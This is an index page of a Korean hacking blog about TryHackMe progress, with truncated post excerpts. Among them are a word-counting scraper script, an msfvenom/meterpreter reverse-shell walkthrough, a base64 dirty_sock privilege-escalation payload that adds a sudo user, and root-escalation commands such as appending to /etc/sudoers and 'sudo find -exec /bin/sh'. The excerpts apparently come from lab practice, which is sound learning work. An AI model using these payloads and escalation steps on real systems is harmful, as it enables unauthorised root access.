본문 바로가기

hacking sorcerer

(372)
Tryhackme에서 GURU 단계에 도달했다 뭐 항상 얘기하지만, 이런 게 중요한 건 아니다 이런 허례적인 것보다는 실질적인 실력이 중요하다 그리고 소프트 스킬도 중요하고 뭐 암튼 그래도 guru 단계에 도달하고 싶었는데 오늘 도달해서 기쁘다 ㅇㅅㅇ 그리고 한국 순위로 본다면 전체 10위 인 것도 나름 즐거움이기도 하다 ​ 안녕하세요 여러분, ​ ​ 어느새 금요일이 돌아왔네요. 돌이켜보면, 지난 몇 달 동안 정말 놀라울 정도로 짧고 긴 시간 같았습니다. 오늘, 저는 제 경력에서 그 어떤 순간보다도 더 큰 성취를 이룩한 것을 이곳에서 자랑스럽게 발표하게 됐어요. TryHackMe에서 GURU 단계에 도달했다는 것이죠! ​ ​ 제가 TryHackMe와 보안 분야의 여행을 시작한 것은 2022년 10월이었습니다. 저는 그 당시 세상에서 가장 낯선 분야를..
화가를 1초만에 끔살하는 방법 뀨~ ​ (본인이 bing에 포함되어 있는 Dall-e를 통해 1초만에 생성한 그림 -개 잘 그리쥬?)
가장 많은 걸 골라보세요 import requests from bs4 import BeautifulSoup from collections import Counter # Function to retrieve website content def get_website_content(url): response = requests.get(url) return response.text # Function to extract words from website content def extract_words(content): soup = BeautifulSoup(content, 'html.parser') text = soup.get_text() words = text.split() return words # Function to generate..
Enumeration Understanding Enumeration is a crucial step in the process of hacking a target system. Its main objective is not just to gain access to the system, but to identify all the possible attack vectors that can be used against it. To achieve this goal, it is necessary to collect as much information as possible about the system and its services. The tools used for enumeration are important, but they are only as effe..
티키타카의 진수 실전 offensive pentesting을 하다보면 자연스럽게 meterpreter(msf6)를 쓰는 빈도가 늘어날 수밖에 없다 그래서 이걸 기본적으로 얼마나 잘 활용하는 능력도 역시 해커라면 가지고 있는 기본적인 능력이기도 하다 위에 나온 내용은 msfvenom으로 rev_shell.elf를 만든 후 python3 http.server 와 wget 을 이용하여 그걸로 elf 로 set payload linux/x86/meterpreter/reverse_tcp 요로코롬 연결한 거라고 볼 수 있다 포트를 맞추어서 정확히 연결해주고 run으로 실행한 뒤 ./rev_shell.elf로 동시에 싱크를 맞추어주면 해당 시스템에 정확히 침투할 수 있다
쟤~~쟈자밌는 해킹 python3 -c 'print("aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawp..
해킹하는 제다이 큐큐 보면 알다시피 root 권한을 얻는게 엄청 쉽게 되어 있습디야다당 ​ 초반에 끝없이 뇌절하는 서버 ​ rm .bashrhc nano /opt/brilliant_script.sh ​ #!/bin/sh ​ echo "alex ALL=(ALL:ALL) ALL" >> /etc/sudoers; ​ sudo find /etc/passwd -exec /bin/sh \; => root ​ service ssh start service cron start httpd-foreground -- 단서 ? ​ cd /lib/x86_64-linux-gnu sudo mv oldliblogging.so liblogging.so ​ /root/.ssh/authorized_keys ​ strings fixutil | grep "fixu..
어허 자네 웹사이트에 얼마나 있는지 좀 볼까? import click import requests import re from bs4 import BeautifulSoup from collections import Counter def fetch_html_content(url): """Fetches the HTML content of a webpage at a given URL.""" response = requests.get(url) response.raise_for_status() # raise an exception for non-200 status codes return response.text def extract_words_from_text(text, min_length=0): """Extracts all words from a given ..